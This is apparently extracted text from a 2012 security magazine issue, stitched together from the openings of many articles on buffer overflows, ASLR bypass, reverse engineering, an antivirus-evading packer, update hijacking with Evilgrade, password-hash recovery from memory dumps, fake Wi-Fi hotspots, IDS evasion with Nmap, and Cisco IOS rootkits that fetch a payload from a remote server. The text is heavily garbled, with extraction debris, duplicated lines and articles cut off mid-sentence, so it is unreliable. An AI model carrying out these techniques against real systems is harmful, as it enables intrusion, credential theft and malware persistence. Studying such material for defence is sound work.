A DLL is a Dynamically Linked Library of executable code (Shewmaker, 2006). Code libraries are important as they allow developers to reuse common functions. It is firstly inefficient and not economical to rewrite of the same section of code over and over. More importantly, when the same code is replicated in many blocks it becomes more difficult to patch or update software. In addition, standardized libraries allow developers to reuse set functions rather than having to recode them and hence reinvent the wheel each time they develop a program. It is important to note that the best programmers make mistakes. Whenever they have to recode the same material the chances of an error increase. A DLL can reference a common function allowing the programmer to just learn the call needed rather than having to rewrite create their own. In this, the code would reference the external function using the DLL which is loaded into memory for use by the program. In this article we will be discussing DLLs are loaded into a running memory process. This is a feature of Windows and not a bug. That said, many features also lead to exploitations.

01/2012

BUFFER OVERFLOW

Smashing the Stack

For decades hackers have discovered and exploited the most concealed programming bugs. But how is it possible to leverage a buffer overflow to compromise software in modern operating systems?

T his article will introduce the reader to the basic

principles of code exploitation. We will see what

happens when a process is executed or terminated,

and how a buffer overflow vulnerability can be leveraged to execute malicious code. Our analysis has been based on the Intel Architecture 32 bit (IA 32) as it represents the main target for hackers and worms. Our code and tools are made available in a way that the reader can reproduce our attack scenarios. Don’t miss the next Hakin9 issue, where we will analyze real vulnerabilities.

Theoretical Background

We start our journey with a small introduction on how processes, memory and registers work. A program becomes a process when it is loaded by a loader in memory and executed. In this phase, a process identifier, called PID (Process Identifier) is assigned to the process. When the loader loads the executable file, some special information that is contained in its header is read. The executable file is in fact a COFF (Common Object File Format). The COFF implementation is called Portable Executable (PE) in Windows, and Executable and Linking Format (ELF) on Linux systems. Two main sections are defined:

• the header permits to load in RAM memory the executable file. It holds the information about the .text, the .data and the .stack sections (and .bss)

• the payload contains the code

When the executable is loaded, the OS organizes the allocated memory in three areas:

• Text: read only area that contains the program’s code and other read only information. It corresponds to the COFF’s text section.

68

information. It corresponds to the COFF’s text section. 68 • Data: region where static variables are

• Data: region where static variables are saved. It corresponds to the COFF’s data section.

• Stack: region in which local variables, return values and parameters of the function are saved. From the perspective of this article, this is the area of interest. A fourth area is the Heap, in which dynamical variables used by the process are allocated.

In a system, any sort of operation is performed using CPU registers that serve as store units. Intel Architecture 32bit (IA32) defines four register families:

General Purpose Registers (GPRs)

• Segment Registers: CS (Code Segment), DS (Data Segment), ES (Extra Segment), FS, GS, SS (Stack Segment)

• Control Registers: EIP, CRX,

• Other: EFLAGS, etc

The GPRs registers are defined as: EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP. The E letter was introduced in the change from 16 to 32 bits. The EAX register is shown in the Figure 1. Two special registers are the Base Pointer (EBP) and the Stack Pointer (ESP). They are commonly adopted

���

��

��

��

Figure 1. Structure of EAX register

01/2012

BUFFER OVERFLOW

Smashing the Stack 2

Modern operating systems come with sophisticated protection mechanisms to prevent “one-click” exploitations. But, how can attackers bypass such techniques to compromise remote machines all over the world? And downloading PDF documents is always a safe practice?

W elcome to this follow-up on our previous article on the exploitation of software vulnerabilities, which we published on Hakin9 ES #1 [0].

This article is made of two chapters: In the first one we describe the different protection mechanisms that have been introduced in modern operating system to make exploitation more difficult. We then present several popular workarounds used by attacker to bypass such techniques. Finally, for the joy of our readers, we analyze a real exploit for a Acrobat Reader’s stack- based buffer overflow (CVE-2010-2883).

epilogue. Firstly a random value, called cookie or canary, is stored on the stack, and a sort of variable reordering is done. Once the program is launched, the cookie is saved in the .data section, then, if necessary, during the procedure prologue is moved on the stack between the local variables and the ret address (the value we are going to protect). In a generic situation the stack appears like in Figure 1. Figure 2 shows how to enable/disable this flag on Visual Studio 2008. This is the new prologue using the /GS flag:

Protection Mechanisms Against Buffer Overflow

vuln!main:

In this chapter we present the protection mechanisms

00411260

55 push ebp

introduced in Windows 7 and the Visual Studio 2008

00411261

8bec mov ebp,esp

suite to enhance the security of their users by preventing

00411263

83ec4c sub esp,4Ch

one-click easy exploitations.

00411266

a100604100 mov EAX,dword ptr [vuln!

At a first glimpse, we can divide these mechanisms in three classes of categories:

cookie (00416000)] 0041126b 33c5 xor EAX,ebp 0041126d 8945fc mov dword ptr [ebp-4], EAX

• Compiler-based: the /GS flag

• Linker-based: the /SafeSEH flag, ASLR and DEP

• Runtime checks

Buffer Security Check – /GS

We start by analyzing the /GS flag provided by the Visual Studio C/C++ compiler. This option tries to prevent stack-based buffer overflow at runtime by adding specific code to the procedure’s prologue and

����

����

����

����

������
������

���

���

Figure 1. /GS stack situation

80

��� ��� Figure 1. /GS stack situation 80 As someone can see, the value of the

As someone can see, the value of the cookie is stored in the EAX register, xored with the base pointer and put on the stack.

stored in the EAX register, xored with the base pointer and put on the stack. Figure

Figure 2. /GS on Visual Studio 2008

01/2012

BUFFER OVERFLOW

Exploit a Software

with Buffer Overflow Vulnerability and Bypassing Aslr Protection

In this article you will find out what the Buffer overflow vulnerability is, and how you can scan any software for this kind of vulnerability.

88

Y ou will also learn how to write your own

exploitation with python programming language

and bypassing ASLR protection and finally, how

to run your own shellcode to control Vulnerable OS.

What is Buffer overflow

Buffer overflow is an anomaly where a program while

writing data to a buffer overruns the buffer’s boundary and overwrites adjacent memory. This is a special case

of violation of memory safety. For example: if you have a

2 liter bottle and you tried to fill it with 2.5 liters of water,

of course the water will overrun the bottle boundary and

0.5 liter will fall down. Buffer overflow vulnerability is the most dangerous vulnerability in the software world because it could allow for an exploitation for OS which include this vulnerable software.

You can have a look at Buffer overflow top threats, http://

For example

Here – a program has defined two data items which are

adjacent in memory; an 8-byte long string buffer, A, and

a two-byte integer, B. Initially, A contains nothing but zero bytes, and B contains the number 1979; characters that are one-byte wide (Figure 1).

Now, the program attempts to store the null- terminated string “excessive” in the A buffer. By failing

to check the length of the string, it overwrites the value

of B (Figure 2). Although the programmer did not intend to change B

at all, B’s value has now been replaced by a number

formed from part of the character string. In this example, on a big-endian system that uses ASCII, “e” followed by

a zero byte would become the number 25856. If B was

the only other variable data item defined by the program, writing an even longer string that went past the end of

B could cause an error such as a segmentation fault,

threat/. If we looked at buffer overflow in technical view:

A buffer overflow occurs when data written to a buffer,

due to insufficient bound checking corrupts data values in memory addresses adjacent to the allocated buffer.

And what about ASLR protection?

ASLR refers to address space layout randomization. For example, if you have an instruction like “Call ESP

from kernel32.dll“ and this instruction offset location

is in 0000001, after rebooting your PC this offset will

be changed to another number. This means we can’t

will be changed to another number. This means we can’t Figure 1. Empty registers Figure 2.
will be changed to another number. This means we can’t Figure 1. Empty registers Figure 2.

Figure 1. Empty registers

number. This means we can’t Figure 1. Empty registers Figure 2. registers after �lling it Figure

Figure 2. registers after �lling it

Figure 3. VUPlayer

This means we can’t Figure 1. Empty registers Figure 2. registers after �lling it Figure 3.

01/2012

REVERSE ENGINEERING

Reversing EXE with OllyDbg

This article is a basic introduction to Reverse Engineering. I have chosen to illustrate the reverse engineering of a sample executable file, and how to patch it. The article focuses primarily on a practical example of reversing.

S o what is reverse engineering (RE)? Wikipedia says: Reverse engineering is the process of discovering the technological principles of

a device, object, or system through analysis of its structure, function, and operation. Normally, source code is compiled to one or more object files which are then linked to form an executable. The source code is in human readable form, object files are binary files with human-readable symbols. Executables are pure binaries. When we attempt to revert a binary executable into its object form, it is called disassembly. Converting an object file into source code is called decompilation. The whole process is called reverse engineering (Figure 1).

Goals of RE:

The main goals of RE may include the following:

• Security/Vulnerability Research: The most common aim of doing RE is the discovery of potential flaws in the source code such as buffer overflows or any weak business logics implemented, for example client side validations, weak/homemade

����������

�������������

����������

���������� �����������

�����������

����������� �����������

�����������

�����������
�����������
����������� ����������� �����������
����������� ����������� �����������

98

Figure 1. RE Process

����������� 98 Figure 1. RE Process encryptions schemes etc. These can be highlighted and may

encryptions schemes etc. These can be highlighted and may ultimately determine how how secure or insecure the software is.

• Malware research: Understanding behavior and

property of malware is very necessary in order to

how they behave, how

develop a mitigation plan

they propagate, what flaws they exploit, etc.

• Writing drivers: Sometimes writing a driver for your hardware requires reverse engineering in order to gain a deep understanding of its operation

• Patch Analysis: Before applying patches they can be reverse engineered to take deep dive into their inner functionalities.

A little Dive Into Assembly and Registers

Knowledge of assembly is required to perform a successful RE of a program. Although study of assembly and instruction sets is a separate topic in

���������

���������
   

���������

   

���

����������������

 

����������������

 

����������������

�������

 

���������

���������
   

��������������

 

���

 
 

�������

 

�����������

 

�����������

��������

�����������

��������

Figure 2. Stack

01/2012

REVERSE ENGINEERING

A Quick „Hands On”

Introduction to Packing

On Windows systems, programs are usually available in the PE file format with the .EXE extension. Although this file format is quite complex, it is now well documented, so understanding how it is globally supposed to work is pretty easy and you can find a lot of programs designed to open/analyze/modify PE executables.

T hose which are designed to modify PE files (for various purposes) are often called packers. We’ll learn how to write one of those in this article.

We’ll start by taking a glance at PE file format’s basis; then we’ll design the principle of a small packer able to modify our pentest tools in such a way that they are less detected by AVs; and finally we’ll implement it in Python using both the good old “pefile” module and the brand new miasm reverse-engineering framework.

The tools

pe�le

The pefile module is a multi-platform Python module used to read and work with Portable Executable (aka PE) files. It can be downloaded here: http:// code.google.com/p/pefile/. We’ll use this specialized module throughout the article; it is very efficient when dealing with PE files. The drawback of being specialized is that some steps of writing our packer can’t be done with pefile alone.

of writing our packer can’t be done with pefile alone. Figure 1. Overview of a PE

Figure 1. Overview of a PE �le’s structure

102

alone. Figure 1. Overview of a PE �le’s structure 102 miasm miasm is a free and

miasm

miasm is a free and open source (GPLv2) reverse engineering framework for python that can be downloaded here: http://code.google.com/p/smiasm/. Being a reverse-engineering framework, it is much more versatile than pefile, but it is also much younger and still a bit unstable. Despite its youth we’ll see that it is sufficient to build a complete tiny packer.

PE format

Overview

In their simplest form PE files can be represented as a collection of sections and a bunch of metadata. Sections are blobs that are mapped in memory when the program starts. These blobs can contain anything useful to the program: such as the program code itself, constant values, icons, etc. The metadata (mostly located in the PE file headers) contains a lot of information; at the very least the metadata defines where the sections are located in the file, what their name is, where they are supposed to be mapped to in memory, and where the starting point of the program is in memory, once the sections are mapped.

Listing 1. pe�le’s basis

>>> import pefile #loading the pefile module >>> pe = pefile.PE("calc.exe") #we open the well- known ‘calc.exe’ program >>> for s in pe.sections:

.text

.data

.rsrc

print s.Name

01/2012

REVERSE ENGINEERING

Hacking Applets:

A Reverse Engineering Approach

In this article we’ll discuss a technique that can be used to modify the applet’s Java byte code without having to recompile the applet. This is useful when the source code of the applet is not recoverable because it is obfuscated using tools such as DotFuscator.

110

Y ou are going to learn the reverse engineering

and patching of Java based applications. We’ll

use a common deployment scenario where:

• The applets are signed

• The applets run in the context of Internet Explorer, using proxy settings imported from the browser settings.

A brief about Java class file format

The Figure 1 shows the basic layout of a Java class file. Now we’ll take a look at some of the important members, which will be useful as we move ahead:

reverse engineering applications; this array holds the class byte code.

Code Attribute:

This is a variable length structure, this is used to hold the code of the methods defined in the class/interface, max number of local variables, max stack size, and an exception table which indicates the extent and nesting of try blocks and corresponding catch blocks. This also holds some other important attributes, called

LineNumberTable and LocalVariableTable, these attributes

hold information that is used by debuggers to locate local variables and match the byte code with the respective line number in the original source code.

Constant Pool

The Java virtual machine relies on symbolic reference of classes to get the runtime layout, the byte code refers to these symbolic references, and these references are placed in the constant pool. Each constant pool entry has the following format:

cp_info {

u1 tag;

u1 info[];

}

Fields Array

This gives the complete description of all the fields in the class/interface.

Method Array

The method array is another important structure that we need to be aware of before

method array is another important structure that we need to be aware of before Figure 1.

Figure 1. Java class �le format

method array is another important structure that we need to be aware of before Figure 1.

01/2012

EXPLOITING CLIENT SOFTWARE

Hijacking Software Updates with Evilgrade

116

On a daily basis, software and applications are connecting to remote servers looking for updates. Almost every modern application comes with a simple, built-in update mechanism. Usually it is sensible for users to accept updates that improve the security and operation of the program.

B y default, operating system and applications are configured to automatically check for updates for themselves, and notify users when they are

available. When prompted, one simply clicks OK and the newest version will be downloaded and installed on your computer. This is very elegant feature but it encourages users to accept updates without verifying the source, reading the change log or license agreement. Doing so would be tedious considering the plethora of security programs, productivity suites, communications software and multimedia applications we have on our computers. Attacking users via update systems is not new. Software developers do not spend much time or effort on updates and secure delivery mechanisms. That’s why standard processes for updating applications make many users vulnerable The process is as follows:

securing the upgrade process. A lot of applications do not verify the update’s contents and blindly trust the master update server. This does nothing to prevent an attacker pretending to be the update server and submit an application file to run on the system. This can be achieved using the standard man in the middle attack, DNS cache poisoning and Evilgrade, an advanced utility for delivering fake updates that can contain malicious content for a ready module. Evilgrade is modular framework that allows attackers to take advantage of poor update implementations by injecting fake updates. It was developed in Perl and includes ready-made modules. While the framework is written in Perl, you can run it on any platform. I used it on Backtrack 5. You can also install it on Windows operating systems by adding Active Perl.

• Application by initiates update process

• Application will connect to the DNS server host for example update.app1.com

• DNS server replies with server IP (for example

200.1.1.1).

• Application downloads a special file with information about the update, for example lastupdate.xml from

update.app1.com

• Application analyzes the update file and detects new updates

• Finally App1 downloads and execute the update:

These are the standard steps used by most software applications to install patches. You will notice that there are few security measures like authentication on the server level, checking the digital signature of the update or other elementary operations for

Evilgrade Module Development

Evilgrade’s most important functionality is the Module framework that we can use for attacking software updates. These modules are very simple to create. So if you are looking to add a new module for attacking new software, you can add a Perl module package and integrate it in the module folder for later use. Here is a module for Sun Java updates. You can change the value according to your desired application: see Listing 1.

Evilgrade on BackTrack 5:

First you need to download Evilgrade from the official website (http://www.infobytesec.com/) If you have difficulties in finding the software packages you can use the Google code mirror (http://code.google.com/p/isr- evilgrade/). Next you need to extract the software and run it as follows (Linux):

http://code.google.com/p/isr- evilgrade/ ). Next you need to extract the software and run it as follows (Linux):

01/2012

EXPLOITING CLIENT SOFTWARE

Direct Object Reference or,

How a Toddler Can Hack Your Web Application

There is no point in denying that everyday software is steadily moving from desktop applications to Web applications. When you can check your mail, play games, create documents and file your tax report without ever leaving your browser, then you are indeed a citizen of the Web.

I n this era, many miscreants have changed their game. It’s easier for them to impersonate you or steal your private data from a vulnerable Web application

than to take control of the Extended Instruction Pointer (EIP) register of your CPU. The reason is simple. As

a software industry, we have more experience writing

contains the title of each message and lastly the message column contains the actual message exchanged between two users. Now lets look at some of the PHP functions used by the Web application to display a user’s Inbox and allow him to read incoming messages (Listing 1).

native applications in C and C++ than writing Web applications in PHP and JavaScript. People still write

Viewing the INBOX

bugs in their code, but they are definitely harder to find and exploit than it was 10 years ago. In this article we will investigate one type of Web application vulnerability, namely Direct Object Reference. A Direct Object Reference occurs when an identifier, used in the internal implementation of

The function get_message_titles() is responsible for providing logged-in users an overview of their Inboxes. The first thing that the function does is to check whether the user is logged-in. It does this by checking whether the superglobal $_SESSION array contains a key titled user_id. This key is set by the Web application when

a

Web application, is exposed to users. When this is

the user successfully logs in, and is typically a unique

done insecurely, it can lead to a lot of trouble. This

identifier in the Users table of the application much like

vulnerability is probably one of the easiest to exploit but

the unique identifier of each message in the Messages

is

so deadly and prevalent that it claims the 4th position

table. We will not need that function in our discussion

in

OWASP’s Top 10 Web Application security risks [2].

thus for the sake of brevity, it is not shown in Listing 1.

Many institutions have fallen victim to it, with the most recent example of an Australian financial company which was vulnerable in a way that made it possible for anyone to access other peoples’ private financial information [1].

If that key is not set, then the code redirects the user to the login page of the Web application and returns. If the user is indeed logged-in then the user’s user_id is extracted from his session. Note that the

Vulnerable Web Application

In order to make explaining easier, we will use as an example a dummy Web application that allows logged- in users to send personal messages to each other. All the messages exchanged between members are stored

in a specific table in an SQL database as follows: see

Table 1. The message_id column contains auto-incremented values, unique for every message. The columns to and from contain the user identifiers of the sender and recipient of any given message. The title column

122

and recipient of any given message. The title column 122 Figure 1. Table “messages” containing personal

Figure 1. Table “messages” containing personal messages that users exchanged with each other

Message_id

From

To

Title

Message

776 23

 

11

“Hey!”

“Hey man!<br>

What news?</br>

777 11

 

25

“Foo

“U there?”

778 25

 

42

“No Title”

“Kthnxbye!”

779 23

 

11

“Welcome”

“Welcome to our site! ”

01/2012

EXPLOITING CLIENT SOFTWARE

How to

Recover Passwords from a Memory Dump

Were you ever curious about what could be done with a memory dump of an active computer? This article is a short demonstration on how to acquire a memory dump from a running system, and then how to use tools to not only recover the system password hashes from the memory dump, but also how to decode them.

M alware analysis is an amazing field. To be able to grab a memory dump from a live machine and then have the capabilities to pull useful

information from it just amazes me. Malware analysis tools are used by several different types of professionals for different purposes. Professional and volunteer malware analysis experts use these programs to dissect memory and learn about the latest malware infections. Law enforcement personnel use memory dumps and analysis programs in criminal investigations to gather evidence for court cases. Even penetration testers use these tools to gather information about the systems and target network that they are auditing. The evolution of securing a machine with increasingly complicated system passwords is also very interesting. I have been in the IT field for two decades. And over the years I have seen the IT field move from the ideals that any password will do, to insisting that only long alpha numeric strings including upper and lower case letters and symbols will suffice. You can do some pretty interesting things with memory dumps. If you want to see exactly what was running on a system, you can do that. If you want to see what network connections were active and to what outside networks the system was attached too, you can do that too. Malware analysis programs will even go through a memory dump and find questionable artifacts, hidden and injected code installed by malicious software. But what other items of interest are lurking in the depths of system memory? Can we find pertinent system settings, and even pull information from them? The answer is yes! A copy of registry information is stored in system memory, and we can locate it with

128

is stored in system memory, and we can locate it with 128 malware analysis tools and

malware analysis tools and pull key data from it. But that is not all; a copy of the Windows passwords is kept in memory. And not just for the current logged in user, but a collection of the passwords for ALL of the system’s users. The passwords are not stored in plain text in memory. They are stored as password hashes. Hashes are an encrypted form of the passwords and they are in a format that looks like this:

aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59

d7e0c089c0

The password hash actually contains two separate

hashes of the same password. The hash to the left

of the colon is the LM Hash, or Lan Manager hash.

A very simple encoding of the password that is

compatible with old versions of Windows. The numbers to the right of the colon are a more complex encoding of the password called the NTLM hash. The LM Hash is a very antiquated password hash that was used in pre-Windows NT systems. Basically how it works is that the password is padded to fourteen characters in length if is not already that long. The password is then converted to all uppercase letters and it is divided into two seven byte sections. The two halves are then used to DES encrypt a constant string. This results in two values that are combined to create the LM Hash. This hash has been cracked a long time ago, but it is still computed and stored in Microsoft’s current operating systems.

NTLM, another old hashing technique, is a bit better. If you have a fourteen character password, it would allow

all fourteen characters to store the hash. The password

is not broken into two halves. It also allows upper and lower case letters, instead of converting them all to

01/2012

EXPLOITING CLIENT SOFTWARE

Creating a

Fake Wi-Fi Hotspot to Capture Connected Users Information

We can use a standard laptop to create a fake open wireless access point that allows us to capture a large amount of information about connected users; in certain environments, such as airports or meeting areas, this kind of operation can represent an enormous security threat but, on the other hand, the same approach is a powerful way to check the wireless activity in certain areas where the security is very important.

134

E very day an enormous number of users try

to connect their devices (laptops, tablets,

smartphones, etc.) to one or more Wi-Fi wireless

Hotspots in order to use internet: many of these people connect to wireless networks without considering whether the Hotspot used is fake or built ‘ad hoc’ mode to conduct illegal or fraudulent operations (capturing personal data, fraud, identity theft, etc.). With a little effort, anyone can create a fake Wi-Fi Hotspot and use it to gather precious information about connected users, information such as usernames, passwords, messages and so on. Using a standard computer (Figure 1) and some open-source software, an attacker can set up bogus Wi-Fi gateways where many laptops, smartphones and other latest generation mobile devices will automatically connect: and once a connection is established, all data passing through the Wi-Fi gateway can be read directly (not encrypted data) or after a short/long processing period(encrypted data). A collateral aspect associated with this kind of risk is the possibility for an attacker to simulate a standard Wi-Fi Hotspot where users have to pay to obtain the internet access: in this case users are invited to pay through their credit card; when the attacker has this information the consequences should be crystal clear. The weakest element of the Wi-Fi Hotspot system is the absence of a strong identification mechanism, because the only form of identification used is a name, typically the Hotspot name. For this reason it is very simple to create a bogus Hotspot and deceive a large number of users. It is a worthy goal to create a system able to solve or reduce this kind of problem: a trustworthy authentication service based on a detailed identification

authentication service based on a detailed identification between devices and Hotspots. However, the main problem

between devices and Hotspots. However, the main problem remains, because there is not a way for users to distinguish fake hotspots.

Everywhere

An attacker can use his properly con�gured laptop in a large number of public places, even in an airplane, simulating the Wi-Fi gateway used by airline and capturing personal data of connected passengers.

Build up the system

In order to build our system we only need a standard laptop with two network adapters: two wireless adapters

a standard laptop with two network adapters: two wireless adapters Figure 1. Fake Wi-Fi Hotspot operating

Figure 1. Fake Wi-Fi Hotspot operating scheme

01/2012

EXPLOITING CLIENT SOFTWARE

Deceiving Networks Defenses

with Nmap Camouflaged Scanning

An attacker could deceive an IDS/IPS system through a particular feature offered by Nmap software, a simple option able to trick the rules generally used in this kind of systems to detect any suspect activity inside a medium/large network; the used software is the most famous network scanner in the world and the knowledge of its potentiality is a good way to improve our security policies.

T oday we can find a very large number of tools devoted to the exploration of the remote networks but in spite of this, the sector operators

(network and system administrators, attackers, etc.) all converge toward a specific software: Nmap, a powerful tool universally considered the better of this category. At the same time we can observe that nearly all medium/large sized networks use systems such as the IDS (Intrusion Detection System) and the IPS (Intrusion Prevention System) in order to detect and alert this kind of activity. In a short, an IDS system works in passive mode, watching the network traffic and comparing its packets with a certain number of configured rules and activating an alarm when it detects something suspicious: in

activating an alarm when it detects something suspicious: in Figure 1. A typical IDS system placement

Figure 1. A typical IDS system placement

142

suspicious: in Figure 1. A typical IDS system placement 142 Figure 1 we can see a

Figure 1 we can see a typical IDS system placement inside a network. An IDS is able to detect several types of malicious traffic, a traffic that is usually not blocked by a firewall system (attacks against host services, unauthorized login attempts, viruses, etc.). It uses various methods to detect threats and these methods are mainly based on the ‘stateful protocol analysis’ and ‘signatures/anomalies detection’. An IPS system operates as a IDS, but differently from this one, it can also block malicious traffic and just for this reason it is placed ‘in-line’ between the external and the internal networks exposed to attacks. The IPS can block the attacks by terminating the network connection, blocking the user who is making

by terminating the network connection, blocking the user who is making Figure 2. A typical IDS

Figure 2. A typical IDS system placement

01/2012

EXPLOITING CLIENT SOFTWARE

Overriding Function Calls in Linux

Function hooking and overriding plays a vital role in penetration test of thick client application. In this article we will discuss how shared libraries in Linux environment can be overridden with out recompiling the code. By overriding the function calls we can sniff the communication protocol, modify the communication parameters and fuzz the communication protocol.

P en-testing a thick client Linux application involves

reverse engineering. Reverse engineering is

multi step process in which assessor has to

inject malicious code, decompile, disassemble, and debug the application to understand the internals of application. Now-a-days applications are more complex and utilize shared libraries for code reusability. If an assessor can sniff the communication between different modules of an application, it will provide him insight details of how these modules communicate. By leveraging this knowledge an assessor can eventually fuzz the communication protocol to uncover vulnerabilities. Shared library calls can be overridden/hooked easily by using function interposition technique.

Background

In Linux system generally there are two types of libraries. Static libraries (.a) file and Dynamic libraries (.so) file. When a program is compiled with dynamic libraries, list of un-resolved symbols and list of libraries that program is linked-to are included in the binary file.

that program is linked-to are included in the binary file. Figure 1. Illustration of symbols resolution

Figure 1. Illustration of symbols resolution at run-time

150

1. Illustration of symbols resolution at run-time 150 Upon execution the un-resolved symbols are resolved at

Upon execution the un-resolved symbols are resolved at run-time by linked libraries. The linked library that responds first will receive the call.

In above illustration the binary file has an un-resolved symbol for function foo. Lib A has the implementation

of function foo and if libA responds first at run-time to

resolve this symbol, it will receive the call.

Hacking WGET

Let’s consider an example application wget. Wget is

a console-based web downloader, which can interact

with HTTPS in addition to HTTP web sites. For SSL/ HTTPS communication wget relies on OpenSSL library. OpenSSL is open source implementation of SSL/TLS and allow applications to interact easily with SSL/TLS based web sites. We can download https web sites using wget as shown Listing 1. By executing the above command the output should be as follows: Figure 2. You can see from Figure 2 that wget is able to download index.html from https://mail.yahoo.com. Lets assume that we want to figure out the http request headers generated by wget. The first step to achieve this task would be to figure out the shared libraries used by wget. We can use ldd utlility as follows: Figure 3. By using ldd we can observe that wget is using libssl.so.0.9.8, which is OpenSSL library to communicate over HTTPS channel.

Listing 1. Wget command

wget https://mail.yahoo.com --no-check-certificate

01/2012

EXPLOITING CLIENT SOFTWARE

Cracking Java

applications using AOP exploits (part 1)

In this series of articles we will outline an idea on how to gain access into protected Java desktop applications (J2SE) exploiting properties of Java platform that enable Aspect Oriented Programming (AOP), like weaving code into existing classes.

W e will learn the basics of AOP and a simple, yet powerful idea behind the exploit. We will also learn how to harden your Java

applications against such simple but powerful attacks. The author assumes intermediate knowledge of Java and the paradigms underlining Java technology stack.

Introduction

Aspect Oriented Programming is a paradigm that aims to modularise software further by the separation of crosscutting concerns. You will find much better definition and explanation within literature (Jacobson, I., Pan-Wey, Ng, (2004) Aspect-Oriented Software Development with Use Cases, 1st Edition, Addison Wesley.) or among on- line resources (Wikipedia, Aspect-oriented programming, Available: http://en.wikipedia.org/wiki/Aspect-oriented_ programming [18 Sept 2011]), however we would like to focus on practical implications of AOP. Let us see, what those crosscutting concerns of software are. Imagine that your codebase takes advantage of Object Oriented Programming paradigms like modularity, encapsulation, and data abstraction. Now in our imaginary scenario, new requirement comes into light. We need to measure the execution time of each method, in order to find the bottlenecks within the system. Sounds like a programmer’s nightmare. The worst-case scenario (and the worst solution) would be to alter every method of every class by adding logic to measure the execution time. It would cause code entanglement and would compromise modularity and encapsulation. By the instrumentation of our code with the time measuring aspect, we can achieve our goal without manually changing every method of every class. We simply use AOP to apply the same time measuring advice by wrapping it around each method. The

156

measuring advice by wrapping it around each method. The 156 following aspect definition traps calls to

following aspect definition traps calls to every method of every class (*.*) and measures their execution time.

aspect TimeAspect { define Number t; define Pointcut *.* p( );

before: p { t = getSystemTime(); } after: p { output(“Method:“ + thispointcut + “ finished

}

in” +

(getSystemTime() – t) ); }

The above pseudo-code has few keywords highlighted in green that will give us dictionary used henceforth:

Pointcut: is where the aspect is applied. In this case it is every method of every class indicated by wildcards (*.*) having any number of parameters of any type indicated by two dots ( )

before, after, around (types of advice): determines whether the advice will be applied as the name suggests: before, after or around each call to a method that matches pointcut’s criteria.

or around each call to a method that matches pointcut’s criteria. Figure 1. Crosscutting concerns in

Figure 1. Crosscutting concerns in software

01/2012

EXPLOITING CLIENT SOFTWARE

Cracking Java

Applications using AOP (part 2)

160

In the first part, we have introduced the concept of Aspect Oriented Programming. Through very simple practical example, we have shown the capability of AOP, its tools and techniques, which could be used to reverse engineer or even to modify the behavior of a code.

I n the second part of the series, we will present the reader with a bit more advanced use of AOP, which will allow us to reverse engineer obfuscated Java applications. On top of that we will show a trick of password post selection, which we use to find parts of the code crucial to password processing, which in turn will allow us to switch the whole password verification off.

knows of any similar work, the author would be grateful for contacting him about it. Also if you could see a way to improve the presented method or any of the techniques, the author would also appreciate any pointers in the direction of improvement. In the first part of the series (http://hakin9.org/ exploiting-software-12011/), we have introduced the basic concepts and notions used in AOP. We have also guided the reader through an example that solidified all the theory presented there. In the second part we will continue with the theme of reverse engineering and modifying software as a post-production process. The post-production software modification aspect is very important from a security point of view. The ability to find the details of inner workings of an application is a very powerful tool for many Software Security professionals. The ability to dynamically modify the behavior of the code (post- production) is even more powerful tool still. And post- production in reality means: without an access to the source code. Whether through your work or hobby, you wear black or white hat, we hope you will find the article informative and educational. Although the author is a Java programmer by trade, you don’t have to be one in order to successfully follow the methods, techniques and findings. Please keep in mind that AOP as a technology is implemented in most modern programming languages and transplanting our findings to your favorite technology stack should be a matter of mere syntax. It is also author’s intention to improve the security and art of secure software delivery through educating, rather than to cause mayhem among software industry. As in part 1, we will use Eclipse + AspectJ Development Tool.

Introduction

AOP has been used in the domain of Software Security before. Its use was mainly for validation, auditing and authorization purposes, which in turn improve software security as a whole. Those crosscutting concerns are being woven into the existing software after the fully functional code has been delivered. Making the process two staged, allows separating the responsibilities. Programmers implement the business logic, while security professionals implement antidotes to known software vulnerabilities. AOP involvement in improving of software security goes further, as it also facilitates clear definition of security concerns as one-time security policy implementations, rather than security code scattered and tangled across the whole of the codebase. Making the actual implementation of security smaller, means that it is understood better, it is more transparent and less open for implementation errors. We have not found many resources, where AOP was used to reverse engineer or to compromise applications. We have certainly not seen the method of security key post-selection, which we present in this article, which guides to find the data path in the software that the crucial security information, like license key or password, takes. This fact alone does not mean that such work has not been done before, so if the reader

key or password, takes. This fact alone does not mean that such work has not been

01/2012

EXPLOITING CLIENT SOFTWARE

Cisco IOS

rootkits and malware: A practical guide

Cisco IOS is the predominant OS for networking devices on the internet. Cisco IOS has evolved an advanced feature set in the CLI and flexible scripting abilities that provide the network administrator with onboard real-time network event detection, automated network recovery functions, and other valuable capabilities.

T hese features, however, may also be used to exploit critical network devices, network traffic traversing these devices and act as a

launch point for further attacks into a network. This presentation discusses the use of and demonstrates an

IOS Embedded Event Manager rootkit and worm. When a router is infected it can be leveraged into a powerful malware platform. Capabilities demonstrated will be network packet captures, reverse shell connections,

a spam module, and a mini malware httpd server

leveraged with ip address hijacking. A self replicating IOS worm with stealth features and self defense mechanisms are also demonstrated, all with platform independent code. Cisco IOS currently has few rootkits and worms.

Previous rootkits use binary patching of the firmware to insert a trampoline for rootkit code (1). This technique has a limitation in that the firmware must be manually patched. Furthermore, the patching requires distinct changes for different versions of firmware and cpu architectures. Cisco IOS has a powerful scripting and event management toolkit Embedded Event Manager (EEM) which has a number of incarnations. The rootkit and worm are written in EEM TCLSH and are accompanied

by non-EEM tclsh modules and supporting files.

Cisco IOS has a few variations of tclsh in current versions of IOS. The first and easiest variant is the cli tclsh interpreter. To get into the interpreter from enable mode, simply enter router#tclsh and your prompt will change, dropping you into the tclsh interpreter. At this point you can type a combination of tclsh and IOS commands that will execute in real-time. Commands that require a brace/bracket closing will of course wait until the closing brace. This command mode is a good

166

until the closing brace. This command mode is a good 166 way to test out code

way to test out code fragments and to proof of concept small subroutines. An example would be to ping multiple hosts, Listing 1. The notable feature here is that if you type a command that is not a tclsh keyword or a defined procedure, the command is assumed to be a Cisco IOS command to be executed from the privilege level of the user. A feature of the tclsh cli command is the file execute mode. In this mode you have the ability to specify a file to execute with the tclsh interpreter. There is support for direct manipulation of the configuration with the ios_config command. With the ios_config command in a tclsh script you can easily make configuration changes without having to go into a configuration mode. While the file could be located on the flash/disk, the interpreter does understand a remote execution. Remote execution is most helpful in that it forms the basis for the initial payload drop into the router and the remote code execution from the callback server. Here is a brief example in Listing 2. This command will execute tclsh code from the remote file rootme which is located on the web-server on 192.168.1.100. The code for rootme is contained in Listing 3.

Listing 1. Tclsh cli ping

router1# tclsh tclsh% foreach x {12 22 23} { ping 192.168.1.$x }

Listing 2. Tclsh remote execution

